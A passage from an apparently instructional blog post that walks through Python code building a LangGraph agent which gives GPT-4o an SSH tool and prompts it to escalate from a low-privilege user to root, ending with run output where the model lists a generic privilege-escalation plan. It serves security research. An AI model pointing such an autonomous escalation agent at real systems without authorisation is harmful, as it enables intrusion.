<span class="normal"><a href="#__codelineno-3-23">23</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-3-16"><a id="__codelineno-3-16" name="__codelineno-3-16"></a><span class="c1"># Load environment variables</span>
</span><span id="__span-3-17"><a id="__codelineno-3-17" name="__codelineno-3-17"></a><span class="n">load_dotenv</span><span class="p">()</span>
</span><span id="__span-3-18"><a id="__codelineno-3-18" name="__codelineno-3-18"></a>
</span><span id="__span-3-19"><a id="__codelineno-3-19" name="__codelineno-3-19"></a><span class="k">def</span> <span class="nf">_set_env</span><span class="p">(</span><span class="n">var</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span>
</span><span id="__span-3-20"><a id="__codelineno-3-20" name="__codelineno-3-20"></a>    <span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="o">.</span><span class="n">environ</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">var</span><span class="p">):</span>
</span><span id="__span-3-21"><a id="__codelineno-3-21" name="__codelineno-3-21"></a>        <span class="n">os</span><span class="o">.</span><span class="n">environ</span><span class="p">[</span><span class="n">var</span><span class="p">]</span> <span class="o">=</span> <span class="n">getpass</span><span class="o">.</span><span class="n">getpass</span><span class="p">(</span><span class="sa">f</span><span class="s2">&quot;</span><span class="si">{</span><span class="n">var</span><span class="si">}</span><span class="s2">: &quot;</span><span class="p">)</span>
</span><span id="__span-3-22"><a id="__codelineno-3-22" name="__codelineno-3-22"></a>
</span><span id="__span-3-23"><a id="__codelineno-3-23" name="__codelineno-3-23"></a><span class="n">_set_env</span><span class="p">(</span><span class="s2">&quot;OPENAI_API_KEY&quot;</span><span class="p">)</span>
</span></code></pre></div></td></tr></table></div>
<p>Lots of stuff going on here in the background. We're using <a href="https://pypi.org/project/python-dotenv/">python-dotenv</a> through calling <code>load_dotenv</code>. This looks for a <code>.env</code> file in the curent working directory and load environmental variables from it (if they are not already configured within the environment). Variables like these are typically used to pass API-keys and similar to programs.</p>
<p>The one environmental variable in use is <code>OPENAI_API_KEY</code> which is used to connect to OpenAI. Lines 19-23 were copied from the quickstart. They check if the environable variable is set and ask the user for it otherwise. This variable itself will be used by langchain and langgraph itself, so we do not have to do anything with it explicitely.</p>
<div class="language-python highlight"><table class="highlighttable"><tr><th colspan="2" class="filename"><span class="filename">initial_version.py: Connect to the LLM and setup Tools</span></th></tr><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-4-26">26</a></span>
<span class="normal"><a href="#__codelineno-4-27">27</a></span>
<span class="normal"><a href="#__codelineno-4-28">28</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-4-26"><a id="__codelineno-4-26" name="__codelineno-4-26"></a><span class="n">llm</span> <span class="o">=</span> <span class="n">ChatOpenAI</span><span class="p">(</span><span class="n">model</span><span class="o">=</span><span class="s2">&quot;gpt-4o&quot;</span><span class="p">,</span> <span class="n">temperature</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span>
</span><span id="__span-4-27"><a id="__codelineno-4-27" name="__codelineno-4-27"></a><span class="n">tools</span> <span class="o">=</span> <span class="p">[</span><span class="n">ssh_execute_command</span><span class="p">]</span>
</span><span id="__span-4-28"><a id="__codelineno-4-28" name="__codelineno-4-28"></a><span class="n">llm_with_tools</span> <span class="o">=</span> <span class="n">llm</span><span class="o">.</span><span class="n">bind_tools</span><span class="p">(</span><span class="n">tools</span><span class="p">)</span>
</span></code></pre></div></td></tr></table></div>
<p>Now we create a connection to the LLM (<code>gpt-4o</code> in our case) and register some tools that the LLM is allowed to use. As tool, we are using the <code>ssh_execute_command</code> function we described before.</p>
<div class="language-python highlight"><table class="highlighttable"><tr><th colspan="2" class="filename"><span class="filename">initial_version.py: Begin with our Graph</span></th></tr><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-5-31">31</a></span>
<span class="normal"><a href="#__codelineno-5-32">32</a></span>
<span class="normal"><a href="#__codelineno-5-33">33</a></span>
<span class="normal"><a href="#__codelineno-5-34">34</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-5-31"><a id="__codelineno-5-31" name="__codelineno-5-31"></a><span class="k">class</span> <span class="nc">State</span><span class="p">(</span><span class="n">TypedDict</span><span class="p">):</span>
</span><span id="__span-5-32"><a id="__codelineno-5-32" name="__codelineno-5-32"></a>    <span class="n">messages</span><span class="p">:</span> <span class="n">Annotated</span><span class="p">[</span><span class="nb">list</span><span class="p">,</span> <span class="n">add_messages</span><span class="p">]</span>
</span><span id="__span-5-33"><a id="__codelineno-5-33" name="__codelineno-5-33"></a>
</span><span id="__span-5-34"><a id="__codelineno-5-34" name="__codelineno-5-34"></a><span class="n">graph_builder</span> <span class="o">=</span> <span class="n">StateGraph</span><span class="p">(</span><span class="n">State</span><span class="p">)</span>
</span></code></pre></div></td></tr></table></div>
<p>Now it gets interessting: we start with defining our langgraph graph. Within langgraph, you are using <code>Nodes</code> and <code>Edges</code>. The nodes in your graph are the "action points". Those are the locations, where you perform operations or ask a LLM to decide or perform stuff for you. Within the python code, each node will be implemented as a python function (see below). Edges define, which nodes are allowed to pass on information to other nodes.</p>
<p>The information passed between nodes is stored in the <code>State</code>. In our case, we just use a list of <code>messages</code>. <code>Annotated</code> is from python's <code>typing</code> library and allows us to add some metadata to the <code>messages</code> variable. In this case, we store the method <code>add_messages</code> as meta-data. Langgraph will know through this, that if new messages are added, it will call <code>add_messages</code> to add the messages to the list. In our case, we just have a growing list, but you could implement a sliding window or some sort of compaction/compression mechnism through this.</p>
<p>Finally, we create our graph (named <code>graph_builder</code>). We tell it that <code>State</code> will be used to pass messages.</p>
<div class="language-python highlight"><table class="highlighttable"><tr><th colspan="2" class="filename"><span class="filename">initial_version.py: Our first node, the LLM call</span></th></tr><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-6-38">38</a></span>
<span class="normal"><a href="#__codelineno-6-39">39</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-6-38"><a id="__codelineno-6-38" name="__codelineno-6-38"></a><span class="k">def</span> <span class="nf">chatbot</span><span class="p">(</span><span class="n">state</span><span class="p">:</span> <span class="n">State</span><span class="p">):</span>
</span><span id="__span-6-39"><a id="__codelineno-6-39" name="__codelineno-6-39"></a>    <span class="k">return</span> <span class="p">{</span><span class="s2">&quot;messages&quot;</span><span class="p">:</span> <span class="p">[</span><span class="n">llm_with_tools</span><span class="o">.</span><span class="n">invoke</span><span class="p">(</span><span class="n">state</span><span class="p">[</span><span class="s2">&quot;messages&quot;</span><span class="p">])]}</span>
</span></code></pre></div></td></tr></table></div>
<p>Within those two lines, a lot happens! We define our first graph node (called <code>chatbot</code> as this was copied out of the tutorial). What is it doing? It takes all messages that are stored within the state (<code>state["messages"]</code>) and calls out to the LLM. As the first message in the list (as you will see below) is the task that the LLM should achieve, this will give the LLM the task as well as a history about all other actions that already have been taken.</p>
<p>The output of the LLM (typically a <code>str</code>) will be put into an array (and in turn put into a map), thus the output of the node will be, e.g., <code>{ "messages" : [ "the LLM output" ]}</code>. As configured above, the <code>add_messages</code> method will be used to append this to <code>state['messages']</code>.</p>
<div class="language-python highlight"><table class="highlighttable"><tr><th colspan="2" class="filename"><span class="filename">initial_version.py: Let's build our graph</span></th></tr><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-7-56">56</a></span>
<span class="normal"><a href="#__codelineno-7-57">57</a></span>
<span class="normal"><a href="#__codelineno-7-58">58</a></span>
<span class="normal"><a href="#__codelineno-7-59">59</a></span>
<span class="normal"><a href="#__codelineno-7-60">60</a></span>
<span class="normal"><a href="#__codelineno-7-61">61</a></span>
<span class="normal"><a href="#__codelineno-7-62">62</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-7-56"><a id="__codelineno-7-56" name="__codelineno-7-56"></a><span class="n">graph_builder</span><span class="o">.</span><span class="n">add_node</span><span class="p">(</span><span class="s2">&quot;chatbot&quot;</span><span class="p">,</span> <span class="n">chatbot</span><span class="p">)</span>
</span><span id="__span-7-57"><a id="__codelineno-7-57" name="__codelineno-7-57"></a><span class="n">graph_builder</span><span class="o">.</span><span class="n">add_node</span><span class="p">(</span><span class="s2">&quot;tools&quot;</span><span class="p">,</span> <span class="n">ToolNode</span><span class="p">(</span><span class="n">tools</span><span class="o">=</span><span class="n">tools</span><span class="p">))</span>
</span><span id="__span-7-58"><a id="__codelineno-7-58" name="__codelineno-7-58"></a>
</span><span id="__span-7-59"><a id="__codelineno-7-59" name="__codelineno-7-59"></a><span class="n">graph_builder</span><span class="o">.</span><span class="n">add_edge</span><span class="p">(</span><span class="n">START</span><span class="p">,</span> <span class="s2">&quot;chatbot&quot;</span><span class="p">)</span>
</span><span id="__span-7-60"><a id="__codelineno-7-60" name="__codelineno-7-60"></a><span class="n">graph_builder</span><span class="o">.</span><span class="n">add_conditional_edges</span><span class="p">(</span><span class="s2">&quot;chatbot&quot;</span><span class="p">,</span> <span class="n">route_tools</span><span class="p">)</span>
</span><span id="__span-7-61"><a id="__codelineno-7-61" name="__codelineno-7-61"></a><span class="n">graph_builder</span><span class="o">.</span><span class="n">add_edge</span><span class="p">(</span><span class="s2">&quot;tools&quot;</span><span class="p">,</span> <span class="s2">&quot;chatbot&quot;</span><span class="p">)</span>
</span><span id="__span-7-62"><a id="__codelineno-7-62" name="__codelineno-7-62"></a><span class="n">graph_builder</span><span class="o">.</span><span class="n">add_edge</span><span class="p">(</span><span class="s2">&quot;chatbot&quot;</span><span class="p">,</span> <span class="n">END</span><span class="p">)</span>
</span></code></pre></div></td></tr></table></div>
<p>Let's start with finally creating our graph. We add our LLM-calling node (<code>chatbot</code>) and then add a predefined <code>ToolNode</code>. This is a node that will receive messages about calling tools, e.g., allowing the LLM to interact with the world. To let it know which tools are supported, we pass the same <code>tools</code> into it as we registered with the LLM (makes sense, both should know the same tool calls or would get out-of-sync).</p>
<p>Then we start to create the edges between our nodes. There are special <code>START</code> and <code>END</code> nodes that denote the graphs starting and ending points (d'oh, lines 59 and 62). We connect the chatbot to the tool node on line 60, and connect back the tool node to the chatbot on line 61. So the LLM bot might create a message for the user (the result to the incoming question) or might create a tool-call message. The Tool node would take the tool-call message and interact with the external world and then pass back the result to the LLM node.</p>
<p>This creates an infinite loop and we cannot have that, can we? This is why on line 60 we define a condition edge: this is an edge with a condition that can dynamically select the next action (node) to perform. To do this, we define the <code>route_tools</code> method:</p>
<div class="language-python highlight"><table class="highlighttable"><tr><th colspan="2" class="filename"><span class="filename">initial_version.py: either call a tool, or quit</span></th></tr><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-8-41">41</a></span>
<span class="normal"><a href="#__codelineno-8-42">42</a></span>
<span class="normal"><a href="#__codelineno-8-43">43</a></span>
<span class="normal"><a href="#__codelineno-8-44">44</a></span>
<span class="normal"><a href="#__codelineno-8-45">45</a></span>
<span class="normal"><a href="#__codelineno-8-46">46</a></span>
<span class="normal"><a href="#__codelineno-8-47">47</a></span>
<span class="normal"><a href="#__codelineno-8-48">48</a></span>
<span class="normal"><a href="#__codelineno-8-49">49</a></span>
<span class="normal"><a href="#__codelineno-8-50">50</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-8-41"><a id="__codelineno-8-41" name="__codelineno-8-41"></a><span class="k">def</span> <span class="nf">route_tools</span><span class="p">(</span><span class="n">state</span><span class="p">:</span> <span class="n">State</span><span class="p">):</span>
</span><span id="__span-8-42"><a id="__codelineno-8-42" name="__codelineno-8-42"></a>    <span class="k">if</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">state</span><span class="p">,</span> <span class="nb">list</span><span class="p">):</span>
</span><span id="__span-8-43"><a id="__codelineno-8-43" name="__codelineno-8-43"></a>        <span class="n">ai_message</span> <span class="o">=</span> <span class="n">state</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
</span><span id="__span-8-44"><a id="__codelineno-8-44" name="__codelineno-8-44"></a>    <span class="k">elif</span> <span class="n">messages</span> <span class="o">:=</span> <span class="n">state</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">&quot;messages&quot;</span><span class="p">,</span> <span class="p">[]):</span>
</span><span id="__span-8-45"><a id="__codelineno-8-45" name="__codelineno-8-45"></a>        <span class="n">ai_message</span> <span class="o">=</span> <span class="n">messages</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
</span><span id="__span-8-46"><a id="__codelineno-8-46" name="__codelineno-8-46"></a>    <span class="k">else</span><span class="p">:</span>
</span><span id="__span-8-47"><a id="__codelineno-8-47" name="__codelineno-8-47"></a>        <span class="k">raise</span> <span class="ne">ValueError</span><span class="p">(</span><span class="sa">f</span><span class="s2">&quot;No messages found in input state to tool_edge: </span><span class="si">{</span><span class="n">state</span><span class="si">}</span><span class="s2">&quot;</span><span class="p">)</span>
</span><span id="__span-8-48"><a id="__codelineno-8-48" name="__codelineno-8-48"></a>    <span class="k">if</span> <span class="nb">hasattr</span><span class="p">(</span><span class="n">ai_message</span><span class="p">,</span> <span class="s2">&quot;tool_calls&quot;</span><span class="p">)</span> <span class="ow">and</span> <span class="nb">len</span><span class="p">(</span><span class="n">ai_message</span><span class="o">.</span><span class="n">tool_calls</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">:</span>
</span><span id="__span-8-49"><a id="__codelineno-8-49" name="__codelineno-8-49"></a>        <span class="k">return</span> <span class="s2">&quot;tools&quot;</span>
</span><span id="__span-8-50"><a id="__codelineno-8-50" name="__codelineno-8-50"></a>    <span class="k">return</span> <span class="n">END</span>
</span></code></pre></div></td></tr></table></div>
<p>This was copied verbose from the tutorial. In summary, it checks if there's a message within the state. If it has a message and the message is a <code>tool_calls</code> message, i.e., we want to execute an external tool, the next node/action will be our tool node. Otherwise we go to the <code>END</code> node and finish our graph. Why does this work? Well, as long as there are tool calls, the tools will be executed and the results appended to the end of the message log. As soon as the LLM can find an answer, it will send out the answer (not a <code>tool_call</code>), thus the <code>route_tools</code> method will go to the <code>END</code> node.</p>
<div class="language-python highlight"><table class="highlighttable"><tr><th colspan="2" class="filename"><span class="filename">initial_version.py: finalize the graph!</span></th></tr><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-9-66">66</a></span>
<span class="normal"><a href="#__codelineno-9-67">67</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-9-66"><a id="__codelineno-9-66" name="__codelineno-9-66"></a><span class="n">memory</span> <span class="o">=</span> <span class="n">MemorySaver</span><span class="p">()</span>
</span><span id="__span-9-67"><a id="__codelineno-9-67" name="__codelineno-9-67"></a><span class="n">graph</span> <span class="o">=</span> <span class="n">graph_builder</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="n">checkpointer</span><span class="o">=</span><span class="n">memory</span><span class="p">)</span>
</span></code></pre></div></td></tr></table></div>
<p>Now we create the graph. What is <code>MemorySaver</code>? This stores our state between interactions (gives us a in-memory storage while running our agent).</p>
<p>Now, what to use as our initial message (this will be the first message within our `state['messages'] list and task our LLM to "do stuff"). We're using an adapted prompt from our hackingBuddyGPT prototype:</p>
<div class="language-python highlight"><table class="highlighttable"><tr><th colspan="2" class="filename"><span class="filename">initial_version.py: The initial user question for the LLM</span></th></tr><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-10-70">70</a></span>
<span class="normal"><a href="#__codelineno-10-71">71</a></span>
<span class="normal"><a href="#__codelineno-10-72">72</a></span>
<span class="normal"><a href="#__codelineno-10-73">73</a></span>
<span class="normal"><a href="#__codelineno-10-74">74</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-10-70"><a id="__codelineno-10-70" name="__codelineno-10-70"></a><span class="n">template</span> <span class="o">=</span> <span class="n">Template</span><span class="p">(</span><span class="s2">&quot;&quot;&quot;</span>
</span><span id="__span-10-71"><a id="__codelineno-10-71" name="__codelineno-10-71"></a><span class="s2">You are a low-privilege user $</span><span class="si">{username}</span><span class="s2"> with password $</span><span class="si">{password}</span><span class="s2"> on a linux system and your goal is to become the root user by executing commands on the remote system.</span>
</span><span id="__span-10-72"><a id="__codelineno-10-72" name="__codelineno-10-72"></a>
</span><span id="__span-10-73"><a id="__codelineno-10-73" name="__codelineno-10-73"></a><span class="s2">Do not repeat already tried escalation attacks. You should focus upon enumeration and privilege escalation. If you were able to become root, describe the used method as final message.</span>
</span><span id="__span-10-74"><a id="__codelineno-10-74" name="__codelineno-10-74"></a><span class="s2">&quot;&quot;&quot;</span><span class="p">)</span><span class="o">.</span><span class="n">render</span><span class="p">(</span><span class="n">username</span><span class="o">=</span><span class="s2">&quot;lowpriv&quot;</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="s2">&quot;trustno1&quot;</span><span class="p">)</span>
</span></code></pre></div></td></tr></table></div>
<p>As this was taken from my old code, it still uses the <code>Mako</code> template engine (could be replaced with a f-String or similar by now). Also, note that we hard-coded the same credentials as within the <code>SSHConnection</code> before, we will fix this in the next blog-post.</p>
<p>The prompt itself is quite simple, isn't it?</p>
<div class="language-python highlight"><table class="highlighttable"><tr><th colspan="2" class="filename"><span class="filename">initial_version.py: Start and output it</span></th></tr><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-11-76">76</a></span>
<span class="normal"><a href="#__codelineno-11-77">77</a></span>
<span class="normal"><a href="#__codelineno-11-78">78</a></span>
<span class="normal"><a href="#__codelineno-11-79">79</a></span>
<span class="normal"><a href="#__codelineno-11-80">80</a></span>
<span class="normal"><a href="#__codelineno-11-81">81</a></span>
<span class="normal"><a href="#__codelineno-11-82">82</a></span>
<span class="normal"><a href="#__codelineno-11-83">83</a></span>
<span class="normal"><a href="#__codelineno-11-84">84</a></span>
<span class="normal"><a href="#__codelineno-11-85">85</a></span>
<span class="normal"><a href="#__codelineno-11-86">86</a></span>
<span class="normal"><a href="#__codelineno-11-87">87</a></span>
<span class="normal"><a href="#__codelineno-11-88">88</a></span>
<span class="normal"><a href="#__codelineno-11-89">89</a></span>
<span class="normal"><a href="#__codelineno-11-90">90</a></span>
<span class="normal"><a href="#__codelineno-11-91">91</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-11-76"><a id="__codelineno-11-76" name="__codelineno-11-76"></a><span class="n">events</span> <span class="o">=</span> <span class="n">graph</span><span class="o">.</span><span class="n">stream</span><span class="p">(</span>
</span><span id="__span-11-77"><a id="__codelineno-11-77" name="__codelineno-11-77"></a>    <span class="nb">input</span> <span class="o">=</span> <span class="p">{</span>
</span><span id="__span-11-78"><a id="__codelineno-11-78" name="__codelineno-11-78"></a>        <span class="s2">&quot;messages&quot;</span><span class="p">:</span> <span class="p">[</span>
</span><span id="__span-11-79"><a id="__codelineno-11-79" name="__codelineno-11-79"></a>            <span class="p">(</span><span class="s2">&quot;user&quot;</span><span class="p">,</span> <span class="n">template</span><span class="p">),</span>
</span><span id="__span-11-80"><a id="__codelineno-11-80" name="__codelineno-11-80"></a>        <span class="p">]</span>
</span><span id="__span-11-81"><a id="__codelineno-11-81" name="__codelineno-11-81"></a>    <span class="p">},</span>
</span><span id="__span-11-82"><a id="__codelineno-11-82" name="__codelineno-11-82"></a>    <span class="n">config</span> <span class="o">=</span> <span class="p">{</span>
</span><span id="__span-11-83"><a id="__codelineno-11-83" name="__codelineno-11-83"></a>        <span class="s2">&quot;configurable&quot;</span><span class="p">:</span> <span class="p">{</span><span class="s2">&quot;thread_id&quot;</span><span class="p">:</span> <span class="s2">&quot;1&quot;</span><span class="p">}</span>
</span><span id="__span-11-84"><a id="__codelineno-11-84" name="__codelineno-11-84"></a>    <span class="p">},</span>
</span><span id="__span-11-85"><a id="__codelineno-11-85" name="__codelineno-11-85"></a>    <span class="n">stream_mode</span><span class="o">=</span><span class="s2">&quot;values&quot;</span>
</span><span id="__span-11-86"><a id="__codelineno-11-86" name="__codelineno-11-86"></a><span class="p">)</span>
</span><span id="__span-11-87"><a id="__codelineno-11-87" name="__codelineno-11-87"></a>
</span><span id="__span-11-88"><a id="__codelineno-11-88" name="__codelineno-11-88"></a><span class="c1"># output all the events that we&#39;re getting from the agent</span>
</span><span id="__span-11-89"><a id="__codelineno-11-89" name="__codelineno-11-89"></a><span class="k">for</span> <span class="n">event</span> <span class="ow">in</span> <span class="n">events</span><span class="p">:</span>
</span><span id="__span-11-90"><a id="__codelineno-11-90" name="__codelineno-11-90"></a>    <span class="k">if</span> <span class="s2">&quot;messages&quot;</span> <span class="ow">in</span> <span class="n">event</span><span class="p">:</span>
</span><span id="__span-11-91"><a id="__codelineno-11-91" name="__codelineno-11-91"></a>        <span class="n">event</span><span class="p">[</span><span class="s2">&quot;messages&quot;</span><span class="p">][</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">pretty_print</span><span class="p">()</span>
</span></code></pre></div></td></tr></table></div>
<p>Now, the final step: through <code>graph.stream</code> we start the graph and give it the initial task (the just mentioned question from <code>template</code>). Using <code>stream_mode="values"</code> (line 85) will create an event stream will the messages that are passing through the graph.</p>
<p>We use this events on line 88 to watch for potential changes. This allows us to output everything that is happening during exeuction.</p>
<h3 id="the-graph-in-its-full-glory">The graph in it's full glory</h3>
<p>You can use <code>graph.get_graph().draw_mermaid()</code> to get a mermaid diagram with our graph:</p>
<p><img alt="Our Graph in its full Glory" src="../../../../initial_prototype.svg" /></p>
<h2 id="execute-it">Execute it</h2>
<p>Now you can start the prototype with <code>python initial_version.py</code> (I've cut out some noise, also the output will become better over time):</p>
<div class="language-bash highlight"><pre><span></span><code><span id="__span-12-1"><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="o">(</span>venv<span class="o">)</span><span class="w"> </span>andy@cargocult:~/offensivegraphs/src$<span class="w"> </span>python<span class="w"> </span>initial_version.py<span class="w"> </span>
</span><span id="__span-12-2"><a id="__codelineno-12-2" name="__codelineno-12-2" href="#__codelineno-12-2"></a><span class="o">================================</span><span class="w"> </span>Human<span class="w"> </span><span class="nv">Message</span><span class="w"> </span><span class="o">=================================</span>
</span><span id="__span-12-3"><a id="__codelineno-12-3" name="__codelineno-12-3" href="#__codelineno-12-3"></a>
</span><span id="__span-12-4"><a id="__codelineno-12-4" name="__codelineno-12-4" href="#__codelineno-12-4"></a>
</span><span id="__span-12-5"><a id="__codelineno-12-5" name="__codelineno-12-5" href="#__codelineno-12-5"></a>You<span class="w"> </span>are<span class="w"> </span>a<span class="w"> </span>low-privilege<span class="w"> </span>user<span class="w"> </span>lowpriv<span class="w"> </span>with<span class="w"> </span>password<span class="w"> </span>trustno1<span class="w"> </span>on<span class="w"> </span>a<span class="w"> </span>linux<span class="w"> </span>system<span class="w"> </span>and<span class="w"> </span>your<span class="w"> </span>goal<span class="w"> </span>is<span class="w"> </span>to<span class="w"> </span>become<span class="w"> </span>the<span class="w"> </span>root<span class="w"> </span>user<span class="w"> </span>by<span class="w"> </span>executing<span class="w"> </span>commands<span class="w"> </span>on<span class="w"> </span>the<span class="w"> </span>remote<span class="w"> </span>system.
</span><span id="__span-12-6"><a id="__codelineno-12-6" name="__codelineno-12-6" href="#__codelineno-12-6"></a>
</span><span id="__span-12-7"><a id="__codelineno-12-7" name="__codelineno-12-7" href="#__codelineno-12-7"></a>Do<span class="w"> </span>not<span class="w"> </span>repeat<span class="w"> </span>already<span class="w"> </span>tried<span class="w"> </span>escalation<span class="w"> </span>attacks.<span class="w"> </span>You<span class="w"> </span>should<span class="w"> </span>focus<span class="w"> </span>upon<span class="w"> </span>enumeration<span class="w"> </span>and<span class="w"> </span>privilege<span class="w"> </span>escalation.<span class="w"> </span>If<span class="w"> </span>you<span class="w"> </span>were<span class="w"> </span>able<span class="w"> </span>to<span class="w"> </span>become<span class="w"> </span>root,<span class="w"> </span>describe<span class="w"> </span>the<span class="w"> </span>used<span class="w"> </span>method<span class="w"> </span>as<span class="w"> </span>final<span class="w"> </span>message.
</span><span id="__span-12-8"><a id="__codelineno-12-8" name="__codelineno-12-8" href="#__codelineno-12-8"></a>
</span><span id="__span-12-9"><a id="__codelineno-12-9" name="__codelineno-12-9" href="#__codelineno-12-9"></a><span class="o">==================================</span><span class="w"> </span>Ai<span class="w"> </span><span class="nv">Message</span><span class="w"> </span><span class="o">==================================</span>
</span><span id="__span-12-10"><a id="__codelineno-12-10" name="__codelineno-12-10" href="#__codelineno-12-10"></a>
</span><span id="__span-12-11"><a id="__codelineno-12-11" name="__codelineno-12-11" href="#__codelineno-12-11"></a>To<span class="w"> </span>achieve<span class="w"> </span>privilege<span class="w"> </span>escalation<span class="w"> </span>on<span class="w"> </span>a<span class="w"> </span>Linux<span class="w"> </span>system,<span class="w"> </span>we<span class="w"> </span>need<span class="w"> </span>to<span class="w"> </span>follow<span class="w"> </span>a<span class="w"> </span>systematic<span class="w"> </span>approach<span class="w"> </span>that<span class="w"> </span>involves<span class="w"> </span>enumeration<span class="w"> </span>and<span class="w"> </span>identifying<span class="w"> </span>potential<span class="w"> </span>vulnerabilities<span class="w"> </span>or<span class="w"> </span>misconfigurations<span class="w"> </span>that<span class="w"> </span>can<span class="w"> </span>be<span class="w"> </span>exploited.<span class="w"> </span>Here<span class="s1">&#39;s a step-by-step plan:</span>
</span><span id="__span-12-12"><a id="__codelineno-12-12" name="__codelineno-12-12" href="#__codelineno-12-12"></a>
</span><span id="__span-12-13"><a id="__codelineno-12-13" name="__codelineno-12-13" href="#__codelineno-12-13"></a><span class="s1">1. **System Enumeration**: Gather information about the system, including kernel version, installed software, running services, and scheduled tasks. This helps in identifying potential vulnerabilities.</span>
</span><span id="__span-12-14"><a id="__codelineno-12-14" name="__codelineno-12-14" href="#__codelineno-12-14"></a>
</span><span id="__span-12-15"><a id="__codelineno-12-15" name="__codelineno-12-15" href="#__codelineno-12-15"></a><span class="s1">2. **User and Group Information**: Check the current user&#39;</span>s<span class="w"> </span>privileges,<span class="w"> </span>group<span class="w"> </span>memberships,<span class="w"> </span>and<span class="w"> </span>other<span class="w"> </span>users<span class="w"> </span>on<span class="w"> </span>the<span class="w"> </span>system.<span class="w"> </span>This<span class="w"> </span>can<span class="w"> </span>reveal<span class="w"> </span>misconfigurations<span class="w"> </span>or<span class="w"> </span>potential<span class="w"> </span>targets<span class="w"> </span><span class="k">for</span><span class="w"> </span>privilege<span class="w"> </span>escalation.
</span><span id="__span-12-16"><a id="__codelineno-12-16" name="__codelineno-12-16" href="#__codelineno-12-16"></a>
</span><span id="__span-12-17"><a id="__codelineno-12-17" name="__codelineno-12-17" href="#__codelineno-12-17"></a><span class="m">3</span>.<span class="w"> </span>**SUID<span class="w"> </span>and<span class="w"> </span>SGID<span class="w"> </span>Binaries**:<span class="w"> </span>Identify<span class="w"> </span>binaries<span class="w"> </span>with<span class="w"> </span>the<span class="w"> </span>SUID<span class="w"> </span>or<span class="w"> </span>SGID<span class="w"> </span>bit<span class="w"> </span>set,<span class="w"> </span>as<span class="w"> </span>they<span class="w"> </span>can<span class="w"> </span>sometimes<span class="w"> </span>be<span class="w"> </span>exploited<span class="w"> </span>to<span class="w"> </span>gain<span class="w"> </span>elevated<span class="w"> </span>privileges.
</span><span id="__span-12-18"><a id="__codelineno-12-18" name="__codelineno-12-18" href="#__codelineno-12-18"></a>
</span><span id="__span-12-19"><a id="__codelineno-12-19" name="__codelineno-12-19" href="#__codelineno-12-19"></a><span class="m">4</span>.<span class="w"> </span>**World-Writable<span class="w"> </span>Files<span class="w"> </span>and<span class="w"> </span>Directories**:<span class="w"> </span>Look<span class="w"> </span><span class="k">for</span><span class="w"> </span>files<span class="w"> </span>and<span class="w"> </span>directories<span class="w"> </span>that<span class="w"> </span>are<span class="w"> </span>world-writable,<span class="w"> </span>as<span class="w"> </span>they<span class="w"> </span>might<span class="w"> </span>be<span class="w"> </span>used<span class="w"> </span>to<span class="w"> </span>inject<span class="w"> </span>malicious<span class="w"> </span>code<span class="w"> </span>or<span class="w"> </span>scripts.
</span><span id="__span-12-20"><a id="__codelineno-12-20" name="__codelineno-12-20" href="#__codelineno-12-20"></a>
</span><span id="__span-12-21"><a id="__codelineno-12-21" name="__codelineno-12-21" href="#__codelineno-12-21"></a><span class="m">5</span>.<span class="w"> </span>**Cron<span class="w"> </span>Jobs<span class="w"> </span>and<span class="w"> </span>Scheduled<span class="w"> </span>Tasks**:<span class="w"> </span>Examine<span class="w"> </span>cron<span class="w"> </span><span class="nb">jobs</span><span class="w"> </span>and<span class="w"> </span>other<span class="w"> </span>scheduled<span class="w"> </span>tasks<span class="w"> </span><span class="k">for</span><span class="w"> </span>scripts<span class="w"> </span>or<span class="w"> </span>binaries<span class="w"> </span>that<span class="w"> </span>can<span class="w"> </span>be<span class="w"> </span>modified<span class="w"> </span>or<span class="w"> </span>exploited.
</span><span id="__span-12-22"><a id="__codelineno-12-22" name="__codelineno-12-22" href="#__codelineno-12-22"></a>
</span><span id="__span-12-23"><a id="__codelineno-12-23" name="__codelineno-12-23" href="#__codelineno-12-23"></a><span class="m">6</span>.<span class="w"> </span>**Exploiting<span class="w"> </span>Vulnerabilities**:<span class="w"> </span>If<span class="w"> </span>any<span class="w"> </span>known<span class="w"> </span>vulnerabilities<span class="w"> </span>are<span class="w"> </span>found<span class="w"> </span><span class="k">in</span><span class="w"> </span>the<span class="w"> </span>system<span class="w"> </span>or<span class="w"> </span>installed<span class="w"> </span>software,<span class="w"> </span>attempt<span class="w"> </span>to<span class="w"> </span>exploit<span class="w"> </span>them<span class="w"> </span>to<span class="w"> </span>gain<span class="w"> </span>root<span class="w"> </span>access.
